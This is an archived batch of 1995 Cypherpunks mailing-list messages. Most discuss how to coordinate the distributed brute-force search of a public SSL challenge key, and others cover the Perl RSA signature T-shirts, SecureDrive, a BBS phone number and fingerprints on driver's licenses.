Subject: Joel's RSA-t's
In-Reply-To: <01HUN7RYOMZM003M4J@VAX2.ROCKHURST.EDU>
Message-ID: <25850.199508291832@olib>
MIME-Version: 1.0
Content-Type: text/plain



David Wood <WOOD@VAX2.ROCKHURST.EDU> writes:
> I wrote (quite some time ago now, ~4 months?):
> > that's as close to an announcement as he's going to make.  I just
> > checked his netstuff web page, and he's taking orders now!
> > 
> > Check out:
> > 
> > 	http://www.danger.com/ad-perl.html
> > 
> > (this is referenced from Joel's netstuff page under currently
> > available items:
> > 
> > 	http://www.danger.com/netstuff.html
> > )
> > 
> > From the Joel's web page:
> > 
> > > DEADLINE TO ORDER: All orders for these shirts must be postmarked by
> > June 1, 1995.
>
> Has anyone received a shirt from Joel?

He made an announce on the netstuff mailing list a couple of weeks
ago, and also made a statement about the reasons for delays on the
group alt.fan.joel-furr, here's what he said ... (darn it's expired
from news spool), what he said was that he hoped to get the all of the
shirts shipped by the end of this month I think.  Don't quote me on
that cos it's from memory.  But basically his printer moved, causing
1.5 months delay, and he got more orders than anticipated 1500 would
you believe!

Ah... there's more on his current netstuff page:

	http://www.danger.com/netstuff-current.html

> o  Perl/RSA T-Shirts -- Second Batch. Note: The first batch should be
>    done very soon and all 1,500 shirts will be shipped as fast as
>    possible. Some one-time delays took place that could not be avoided
>    and all the shirts should be shipped by the end of August unless
>    something awful happens.

Should answer your question, A: RSN.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vznuri@netcom.com (Vznuri@netcom.com)
Date: Wed, 20 Sep 95 16:25:29 PDT
To: cypherpunks@toad.com
Subject: SSL keyspace etc.
Message-ID: <9509201546195281@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 29 Aug 95 12:40:08 -0700
From: "Vladimir Z. Nuri" <vznuri@netcom.com>

regarding SSL challenge, I am not following this close enough 
to understand completely, but I thought I would offer a few suggestions
for tweaking the code:

--

the issue of grabbing keyspace has been raised. what if someone
malicious just yanked huge areas of keyspace and didn't search them?
it seems that the clients need to return to the server some evidence
that they have searched their keyspace in question. the server could
verify this evidence. for those that don't return the "evidence", that
keyspace could be reallocated to other comers.

the simple approach to all this, if you don't have "evidence", is to 
just have the server keep reallocating the same space over and over
to different crackers. hopefully eventually every part of the keyspace
would be allocated to a "legitimate" worker.

--

the issue of efficiency is very fascinating for this project. essentially
the server has no idea what the block size of key blocks it should dole
out. obviously the server would want to try to dole out equal *processing
chunks* such that the remote machine reports back in a certain amount
of time, no matter what architecture. the problem of course is that remote
machines all have different efficiency.

two possibilities: a sort of "bogomip" calculation is done in the client,
and its processor speed is reported to the server. the server uses
this in a calculation to determine how much to dole out. it could try 
to derive a best fit linear relationship between space covered and
processor spead, or build up a table of results and interpolate for
new requests.

note that the efficiency issue also ties into "what if people take
keys they don't solve". if the server knows roughly how long a client
should take to report back, and it never reports back, it could then
reallocate that key space.

--

another problem of efficiency is that the server is clearly a bottleneck
for servicing requests. the question arises: suppose that the server
could determine the precise interval between which machines would
go back to it for new keys. what is the optimum interval over the
whole project? in other words, give the number of machines participating,
and their processor speeds, what size of key space should be parceled
out to the next request so that the bottleneck at the server is
minimized? this optimum interval must be very hard to derive, because
it depends on the contention based on many incoming connections. it
would involve some probabilistic approximations of the likelihood
of collisions. 

to model it, you might consider a request as taking [n] seconds of
time, and consider that if any two requests are in contention, a 
retry happens after [m] seconds. you could build up models that
would try to minimize the time based on empirical simulations. 
however I would be exceedingly impressed if someone could derive
a formula for this, or give it from some textbook. 

--

adaptive algorithms for all these situations are possible. the server
could use a "hypothesis" in the sense of partitioning out a starting
size of keyspace, and then watch how long it took the client machine to respond
and then assume a linear relationship or something to compute the size
of the next keyspace to hand out to the machine. the server could continually
watch how closely its "hypothesis" (i.e. its estimations of how long a
given machine will take) match the actual returns.

--

more on the idea of evidence: we are working with a hashing algorithm,
right? as evidence the client machines could return checksums of all
the hashes of all the keyspace it searched. it could break up its
own search space into blocks and return the checksums on the hashes
for each block. the server, if it wanted to, could verify these blocks
running its own computations. if it ever found a client was "unreliable",
it could then diminish the keys sent to the unreliable client, or even
send it areas of search space it didn't care about anymore (i.e. areas
that have already been confirmed searched by a more "reliable" client).

--

in fact all this reminds me of the process of intelligence gathering
by an agency, which could be formalized as follows: suppose that
the agency wishes to identify "quality information". it has a set
of sources, A,B,C,D....  now, it can send questions out to these
sources and get information from them. some of them however would
be "unreliable". the agency must devise some means by which it can
weed out the unreliable sources. note that this may even involve
sending them bogus instructions to keep them busy so they do not
themselves suspect they have been "discovered" and then change
their defective plans.

obviously, one of the most important intelligence tools in this
matter is that of *correlation*. you have to determine "truth"
(or "quality information") via the correlation between answers that
the different sources give you. also important to correlation is
*redundancy*. you sometimes have to ask more than one source the
same question, and test the answer. in this model, if A and B
give different answers, you know that one of A or B is "unreliable".

what is very interesting in our case of cracking keys is that the
server can verify the information on its own. in other words, it
has a *control* that it knows is correct that it can judge against
the answers "out there". unfortunately, in contrast, real intelligence
agencies are not always privy to this kind of certain "control" and
in fact have to determine "truth" entirely from a set of sources,
any of which might be unreliable. in this case one has to have
a hypothesis about what is the "truth" and test it to see if it
holds up consistently with all information.

the approaches of attackers are obvious. the most obvious is that
of collusion and infiltration. but I will save the rest for some
NSA spook to elaborate. there are certainly enough colluding and
infiltrating on this list <g>

--

one of the reasons all this interests me is that it really reminds me
of some projects I have worked on in the past. in high school I wrote
a network mandelbrot set program (client/host). the issue of contention
arose and it appeared to me to look like an upside-down parabola after
I plotted some points (curving up, that is). i.e. the optimum was at
the pit of the parabola, and when too few or too many requests happened,
the speed over the overall simulation was increased above the optimum.
some very ingenious readers may actually be able to locate this 
code, which I put in the public domain over 5 years ago.

--

another thing I worked on was trying to find the optimal block size
of communications protocols such as Zmodem, which generally instead
just pick arbitrary block sizes 2^n. I actually was able to attack
this problem analytically through the observations of the properties
of infinite series and calculus techniques. it is a similar problem
but the idea of contention really complicates this issue. (for what
I studied, there was only one client and one server, so to speak).

I still have this paper in Latex format and if anyone is interested
I would be happy to send it to you. it's a really nice example, IMHO,
of how if you use your brain and some mathematics, you can really
get a far more elegant approach than brute force, and know with 
much greater certainty  that what you are doing makes sense 
mathematically.

an awful lot of programmer just tend to bang on the keyboard with out
thinking of the theoretical implications of their work. this is
understandable given that the theoretical implications of even trivial
programs (such as the SSL client/server interactions) can be 
mathematically extremely daunting, requiring even differential 
equations to model fairly simple pieces of code.

--

well, that is my contribution of the moment into the cypherpunk 
annals. one never knows what a little combination of boredom 
and inspiration can lead to.

--V.Z.Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ILSI <gene@ilsi.com>
Date: Tue, 29 Aug 95 19:48:21 PDT
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <9508300248.AA02999@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


     We would like to ask you to place a link from your site to our 
homepage.  Please check out our homepage and let us know what you think.

     We have created a database to assist people that want to advertise on 
the internet.  Using this database, people with homepages will now be able 
to easily find appropriate sites for links to their homepage.

     We are Internet List Services Inc. and we would appreciate your help. 
 Please visit us at:  http://www.ilsi.com/ilsi5.html



     Thank you,

     Gene










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 29 Aug 95 18:01:35 PDT
To: don@cs.byu.edu
Subject: Re: SSL search attacks
In-Reply-To: <199508292102.PAA01897@wero>
Message-ID: <9508300101.AA11637@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


don@cs.byu.edu writes
>From: Scott Brickner <sjb@austin.ibm.com>
>
>>The problems in the current system were to be expected of a first
>>attempt.  In the future:  Only the server assigns segments, only the
>>assignee may report the status of a segment, and after all segments are
>>NAKed we know condition 1 has occurred, at which time we start over,
>>but never assign the same segment to the same searcher.  Limit the
>>number of segments which may be outstanding with one searcher at one
>>time as a function of work rate.  Deploy redundant servers.
>
>BEAAAT STATE! Push 'em back.. WAAAAAAY BAAAACK. 
>(relevant comments follow)

I suppose this does seem like a "statist" protocol, but let's look at
the purpose.  The whole idea of the central server was to permit a
*coordinated* attack on the key.  We've established that there is a 1/e
cost factor in removing the central server.  I just threw out these
items as specific changes which could defend against the identified
attack modes *without* losing the benefit of the central coordination.

In order for the coordinator to be successful, there must be a
mechanism to ensure that someone who knows the key can't break the
system by just reporting "I searched this segment and didn't find it."
This means that the server should consider such statements as
irrelevant, unless it was the *server* who suggested that the user
search the space.  This makes the likelihood of the key's segment being
assigned to a "bad guy" pretty low.

The server *could* take unsolicited NAKs "under advisement", and hand
them out at a slower rate than unACKed segments, but this still allows
the "result hoarder" to slow down the attack.

>In regard to both messages, I think that with sequentially allocated
>keyspace an attacker who knows the real key would have trouble getting the
>right segment unless s/he grabbed a big enough piece. If the search is
>restarted, we know something's up.  Ensuring that nobody gets to search
>keyspace they searched before would be one improvement.

Hence the prohibition against (as Tim put it) "J. Random User claiming
keyspace".

>A random (instead
>of sequential) allocation _by the keyserver_ (out of unallocated 
>piecemeal segments) would also take some work to implement. 

I don't think it would really be that hard, if one were willing to go
with less than "cryptographic" strength in the PRNG, which I don't think
is really necessary here.

The problem is that it's irrelevant to the problem.  Random allocation
at the server is equivalent to simply "shuffling" the segments before
assignment, which doesn't affect the rate at which the space is searched.

>From: tcmay@got.net (Timothy C. May)
>>On the negative side, ostracize or punish those who bite off more than they
>>can chew. This approach is fraught with dangers.
>
>If the search wraps around to catch the UNACK'ed pieces, this type of
>oversight will only slow down the actual discovery of the key. Failure
>to report a found key, though, is a bit different. I would not be opposed
>to having my program report possible hits, with the server being what
>discovers if I've found it or not.

I'm not sure I follow you, here.  The search wraps around on the unACKed
segments because the work was assigned, but not (as far as the server
knows) completed.  This doesn't slow down the discovery of the key,
it just reflects the *real* composite key testing rate as opposed to
the *apparent* rate (which is based on the rate at which the segments
are assigned).  The server doesn't consider a segement "done" until it
gets an ACK or NAK.

>>On the positive side, let everyone simply attack the keyspace as they see
>>fit, picking random parts to attack. This should not be "worse" than a
>>factor of several from a "perfectly coordinated" attack. (I haven't spent
>>time calculating this, but my intuition is that a random attack, with
>>overlapping keyspace, is not a lot less efficiently attacked than
>>attempting to arrange for no overlaps...just based on my mental picture of
>>dropping line segments randomly on some interval and figuring coverage of
>>the line segment.)

NB: Elsewhere, Tim provides an argument showing the efficiency of the
random attack to be 1/e worse than the coordinated attack (about 37%).

>Why not have a random backup-mode, in case someone does mount a denial of
>service attack. Or imploy a combination of the two modes. The machines
>running brloop can search sequentially (out of the middle 50%?) and the
>machines not connected search randomly (out of the outside 50%?). Or,
>venturing further into the I-wonder-who's-gonna-code-this world, log the
>random searches for possible conversion to an exhaustive search later. 
>
>It would be nice to be able to hit the emergency button and switch to
>random mode, but currently I don't think there's a need to actually
>use it.

I still don't see how the server can use unsolicited NAKs as anything
other than a nominal reduction in the probability that the key is in
the NAKed segment.  Perhaps this does give an idea of a server strategy
to do *just* that, though.

The server maintains a list of the unique users who have reported an
unsolicited NAK for each segment.  Requests for work are filled by
randomly selecting segments, with the highest weight going to the
segments with the fewest unsolicited NAKs, but only segments with
*solicited* NAKs and those assigned, but with no response, are not
considered.

If the weight were inversely proportional to the square of the number
of unsolicited NAKs (plus one), then segments which have a lot of NAKs
won't likely be assigned until the end of the jobs.

When a segment with unsolicited NAKs is assigned, further weight might
be given to unsolicited NAKs from those users in the future, reflecting
an improvement in their reputation.

The biggest problem with this scenario is that it requires a
potentially *huge* amount of storage on the server.

Another alternative that comes to mind is to hand out segments with
unsolicited NAKs to some of the slower machines.  Since their
contribution to the overall search rate is small, there's less of a hit
taken by assigning them potentially redundant work.  As they provide
verification of the data reported as unsolicited NAKs, the server's
reputation data is improved, and the search can concentrate even more
on the unACKed segments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 30 Aug 95 05:01:58 PDT
To: cypherpunks@toad.com
Subject: Netsurfer Focus on Cryptography
Message-ID: <Pine.SUN.3.91.950829214915.11091B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Netsurfer publishes free HTML "periodicals" delivered by email -- filled 
with the links the short articles refer to.  The latest one just hit my 
mailbox (with tags removed):

---------- Forwarded message ----------
Date: Tue, 29 Aug 95 17:45:39 PDT
From: editor-bounce@netsurf.com
Subject: Netsurfer Focus: Vol. 01, #03 (HTML)

Netsurfer Focus on Cryptography and Privacy

Wednesday, August 21, 1995 - Volume 01, Issue 03

TABLE OF CONTENTS

Intro to Cryptography
Cracking the Code
In ? We Trust</a> Key Certification
Postcards from Cyberspace</a> E-mail Issues
Digital Envelopes</a> Secure E-mail
The Pen is Mightier than the Electron</a> Export Issues
Hiding In Plain View</a> Steganography
Money Makes the World Go Round</a> Cash and E-money
No Names, Please</a> Anonymous Remailers
Big Iron, Big Brother</a> Database Drilling and Surveillance
It's B-a-a-ck!</a> Clipper and Digital Telephony
'Bots, Agents, and Wizards</a> Trusting Software
Information at Your Fingertips</A> Additional Resources
Inky Fingers</A> Print Resources


**********************************
Netsurfer Focus is currently a periodic supplement to Netsurfer
Digest and Netsurfer Tools.

Netsurfer Focus Home Page: http://www.netsurf.com/nsf/index.html
http://www.netsurf.com/nsf/index.html

Back Issues:
If you would like to obtain copies of back issues or resource files 
(in HTML format only) via e-mail,
send mail to info-focus@netsurf.com
with "send crypto-index" in the body of the message.

To subscribe to Netsurfer Digest or Netsurfer Tools:

By WWW form: <A 
href="http://www.netsurf.com/nsd/subscribe.html">http://www.netsurf.com/nsd/subscribe.html</A>
By e-mail: nsdigest-request@netsurf.com
Body:
     subscribe nsdigest-text
     subscribe nsdigest-html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 30 Aug 95 05:02:00 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508300040.UAA07776@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

I wrote:
>"Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com> writes:
>>
>>   date "+%S %M 60 * + %H 3600 * + %j 86400 * + %y 31536000 * + p" | dc
>
>date +"%S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * + %y 
>69 - 4 / 86400 * + 3600 4 * + p" |dc

which has a bit of cruft in it to get universal time, and

>date +"%S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * + %y
>69 - 4 / 86400 * + p" |dc
>
>which returns local time, which is probably what you wanted anyway.

Well, I overlooked the obvious: You can simply add -u to the above to get
universal time i.e., date -u +... etc.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEOyexEcrOJethBVAQGtFwP9GG27cR3UvJX4/gsO8SK3L3pHGv5mjNp+
0mkRwOg+bj+cf44xAxXZ7/iFU2xaT4sAUvqwIaqbv6AfQgwnqTjAZKIR11KtlKPN
1xDkPXArU4PWSjoFal60Qsuqzacauu99wwUfsILhr8S2xWMj406JdTZPMapgZJI0
N2agSYMj6pY=
=LI+M
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Johnson <mpj@csn.net>
Date: Tue, 29 Aug 95 19:20:12 PDT
To: cypherpunks@toad.com
Subject: Colorado Catacombs BBS: 303-772-1062
Message-ID: <Pine.3.89.9508292053.A22709-0100000@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain



Please note that the correct number for the Colorado Catacombs BBS is
303-772-1062.  I have been getting a lot of people calling my home voice 
phone number with a modem, and this is not fun, especially with those who 
do so at wierd times and without their speaker engaged.

Also, note that the old number for the Colorado Catacombs, 303-938-9654, 
has been disconnected due to lack of funds for the BBS.  Sorry about 
that, but in true cypherpunk style, I want to keep the BBS up and running 
with free service for fellow cypherpunks, so I rely on donations instead 
of subscriptions.

Colorado Catacombs BBS - 303-772-1062  (2 lines, same number)
8 data bits, 1 stop bit, no parity, up to 28,800 bps (one modem is 
28,800, the other is 14,400), ANSI terminal emulation.  Access for all 
crypto files is free (in the USA and Canada), and you may use a psuedonym 
to log in if you like.  (I do ask for your real name, but that is for my 
own reference in evaluating uploads).

By the way, web lovers try http://www.csn.net/~mpj for pgp info.

Enjoy!
                  ___________________________________________________________
                 |                                                           |
 |\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 | \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
 |    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
 |    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                 |___________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Tue, 29 Aug 95 17:26:32 PDT
To: cypherpunks@toad.com
Subject: Re: Decoder ring
In-Reply-To: <Pine.SUN.3.91.950829093407.21598A-100000@panix.com>
Message-ID: <199508300026.UAA28443@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


dmandl@panix.com writes:
 >      High-Tech Company Goes Back to the Future with Decoder Rings
 > The Stuff of Cereal Box-Tops Becomes Real Repository of Data and Computer ID

There's a press release at the DalSemi site that describes the
technology in more detail. They embed Touch Memory chips in other
items too, as you'll see if you follow the links.

http://www.dalsemi.com/News_Center/Press_Releases/1995/ring.html

The various chips they supply are as interesting as the carriers:
simple serial numbers in ROM, or the 64k NVRAM mentioned in the
article, or write-once PROMs, or versions that require passwords
(using unspecified decryption), or versions that block access after a
certain date, time, or number of accesses have been achieved.

Fascinating bit of technology. It even has crypto relevance!

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Tue, 29 Aug 95 17:39:40 PDT
To: cypherpunks@toad.com
Subject: Re: Pre-allocating key segments
Message-ID: <199508300039.UAA07603@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




This was supposed to go out yesterday, but I mistyped the address.

-----BEGIN PGP SIGNED MESSAGE-----

Piete Brooks <Piete.Brooks@cl.cam.ac.uk> writes:
>I wrote:
>> ... but I still think the
>> prefetching of some more segments would be useful.
>
>I'm seeing calls from calpoly.edu and albany.net taking less than a second.
>Are you **REALLY** worried about wasting that sort of time, when even a single
>segment usually takes a quarter of an hour even on the faster machines ?

Wow, I knew it had been sped up, but I didn't realize...
You've convinced me.  :-)

>[ Getting down to the implementation details
>  1) it would be hard for brloop to know that brutessl is 3/4s done.
>  2) I can't think how to do prefetching in a safe way, and without disc use
>]

Good points.  Never mind the pre-allocation.

Abashed,

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEKVMREcrOJethBVAQENBQP5AeM1crT8+fqAkWKtFPQHi+ljbP2cwnIy
36jcC4WCQVdKtor5hZZu+0yfyENAirGI6SKFesJFrRi9avMHmOYTo2QTvnhZQYy/
patw2wRXDwrfWY6ndklmssROM59pLhZmngkMlIzEd1QVrmy2YGbKnJOvzIrUwaYL
rGzztIzvLVo=
=UAte
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Tue, 29 Aug 95 17:41:16 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199508300041.UAA08060@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner <sjb@austin.ibm.com> writes:
>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?

One benefit to law enforcement, quite apart from the ability to verify a
license, would be the accumulation of a database of thumbprints of all
citizens, or at least all those who drive.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEOxbBEcrOJethBVAQGnjAP/dPUwWKt+c5+wbg4O4aqoOSQrVjyXiM1j
Vh/devoIQmLuVnTD8AAoUFahLtUmEByyKa/uz2hnJgIu1+y0OJevbALrjFdex6Wm
xqGr70d6ShN65DMOcMVeRvg9MtbhHAt1ktk4+92vUt7AttgqQ5DKsFoAyBVs0SRL
gAQ12b71Hfs=
=AMKA
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 29 Aug 95 18:42:56 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <Pine.SOL.3.91.950829165337.3285A-100000@use.usit.net>
Message-ID: <Pine.SUN.3.91.950829213504.11091A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 29 Aug 1995, Brad Dolan wrote:

> And somebody, Science Applications International Corp. I think, is 
> designing an in-car fingerprint reader / database query-er for cops.  So 
> they can check your bona fides on the road sides.
> 
> bd

It's too bad for law enforcement that the Chadian driver's license I use 
doesn't have any fingerpints on it and was obtained without requiring the 
surrender of any "finger images." 

DCF

"Yes Virginia, heroic Chad fighters equipped with French 
shoulder-launched missles and Toyota Pickups did, in fact, defeat an 
Libyan armored invasion force."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 29 Aug 95 23:04:26 PDT
To: cypherpunks@toad.com
Subject: SSL and MIPS...
Message-ID: <199508300604.XAA10663@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

How much computing power did we actually
use, in terms of MIPS/FLOPS*hours?

An unloaded SS10 that didn't swap went at
approximately 16400 keys/s. How many
MIPS is an SS10 approximately?

How does different algoritms compare?
DES, RC40, RSA512 etc?

Or if I pose the question differently,
what can you do with 30 GIPS for a day?

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 29 Aug 95 23:56:59 PDT
To: cypherpunks@toad.com
Subject: FYI: c2.org now has reasonable net
Message-ID: <199508300652.XAA10601@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Community ConneXion finally has reasonable net. If you thought
about getting an account here in order to take advantage of privacy
services but thought that the lag was too great for it to be useful,
you may want to try again now, as our network line was just upgraded
today.
	Check out http://www.c2.org

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 29 Aug 95 20:53:27 PDT
To: cypherpunks@toad.com
Subject: SSL brute/ng
Message-ID: <Pine.3.89.9508292354.C13222-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



If anyone is putting together a wish list of features for the next 
iteration of the distributed brute would they like to consider some sort 
of mirroring approach for the server (at least on stats or updates/ 
software ) so that some of that traffic could be reduced?  I'm afraid I 
am one of the guilty trying to log on to check on the stats at least once 
and I probably contributed to choking it just by doing that.  If a local 
server could have been updated, it would save bandwidth on the server 
doing real work.

Could a trusted group of segemnt dolers be put together? I like the idea 
of running a benchmark type of program so that I could multiply keys/sec 
times the amount of time I had to donate, and only get a reasonable for 
me number of segments.

I would hope that statistics be gathered on the number of keys tested, 
elapsed time, etc. so that we all got some more or less real world 
insight into key lengths and strengths, effort required to break, that we 
have all heard so many projections about... especially as the doling gets 
more sophisticated and the number of participants/cycle pool increases.
Will there be Hal3?  

Just to ask a really dumb question, how do you know when you get the key?
Is there some plaintext header string you're looking for?  --pjp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Tue, 29 Aug 95 21:00:00 PDT
To: sjb@austin.ibm.com
Subject: Re: SSL trouble
Message-ID: <199508300356.XAA09408@interport.net>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> We've identified several forms of "real-world retaliation:"

> 1) "Result hoarding" - failure to report a found key
> 2) "Segment hoarding" - requesting more segments than one can hope to search
> 3) Denial of service - preventing access to the server

  Perhaps I wasn't clear... by real-world retaliation, I'm
referring to being sued, thrown in jail, belabored about the
head with blunt objects, etc.  The three basic defenses I have
are: (a) not getting people angry, (b) not letting them know who
to be angry at, or (c) the threat of counter-retaliation.  The
"random" method is of type (b).

  I think you are focusing a bit too much on theoretical
efficiency and not enough on bottom-line practicality.  A 37%
waste factor is better than staying in bed and wasting it all.

>>   I _don't_ care about the procedures, as long as I can get
>> the information I need to go my own way.

> So what information wouldn't you be getting?  To "go your own
> way", you need exactly the same information that the client
> workstations use to test one key.  The difference in your code
> and the clients exists solely in how they determine the next
> key to try.

Yes, this is currently true, but there was a suggestion of
witholding part of the challenge in order to keep people honest,
or something like that.  I didn't quite understand it, but I
didn't like it.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 29 Aug 95 23:23:01 PDT
To: cypherpunks@toad.com
Subject: CFS and Securedrive
Message-ID: <199508300622.AAA02022@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Patrick Lear <plear@ekrl.COM>

>Does anyone have any experience with the SecureDrive program and if so 
>can you make any comments about it?

I found it very easy to use and very well designed. My only complaint
was that it prints out a * every time you enter a character of your
passphrase. Other than that, it's a very good product. Too bad 
Wollersheim didn't have it for his client list...

Unfortunately, I switched to linux shortly afterwards. I have yet to
get CFS compiled. (Oh, Matt, by the way, is that README.linux supposed
to be current, because it's a little...errr...cryptic.) For those
of you who would like to see CFS, the unix encryption system, some
dastardly felon exported it and it's on utopia.hacktic.nl. (I did a diff 
against it with my copy, by the way, and it _hasn't_ been tampered with)

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEQDU8La+QKZS485AQEVewMAxN56v4mUZoe5AJSt64ZLRS+KwPiyG/WU
3PxTFGNjxL7l36Z4o2BMN6Bc195gYcxSUfjzvnfegN7gQU2/96IiNLd5b2QTsWJA
WW56L92yJkxWYeYoQRRhRP1+Emj2fqaX
=aU+M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 29 Aug 95 23:54:30 PDT
To: cypherpunks@toad.com
Subject: Re: SSL stuff
Message-ID: <199508300653.AAA02079@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Piete: please read the PS at the bottom

From: Scott Brickner <sjb@austin.ibm.com>

>>A random (instead
>>of sequential) allocation _by the keyserver_ (out of unallocated 
>>piecemeal segments) would also take some work to implement. 
[snip]
>The problem is that it's irrelevant to the problem.  Random allocation
>at the server is equivalent to simply "shuffling" the segments before
>assignment, which doesn't affect the rate at which the space is searched.

no, but it keeps someone from knowing where the key is at from grabbing
it for themselves. If the segments were shuffled, the only way to ensure
"getting" the keyspace with the key is to grab HUGE chunks. And grabbing
50,000 segments didn't go over well last time, did it...


>I'm not sure I follow you, here.  The search wraps around on the unACKed
>segments because the work was assigned, but not (as far as the server
>knows) completed.  This doesn't slow down the discovery of the key,

If the segment with the real key is the first assigned and the last ACKed
(reporting key found), the search went on 30 hours extra. But that doesn't
cause as much problems as a (false) ACK of no key found. 

>>It would be nice to be able to hit the emergency button and switch to
>>random mode, but currently I don't think there's a need to actually
>>use it.

>I still don't see how the server can use unsolicited NAKs as anything
>other than a nominal reduction in the probability that the key is in
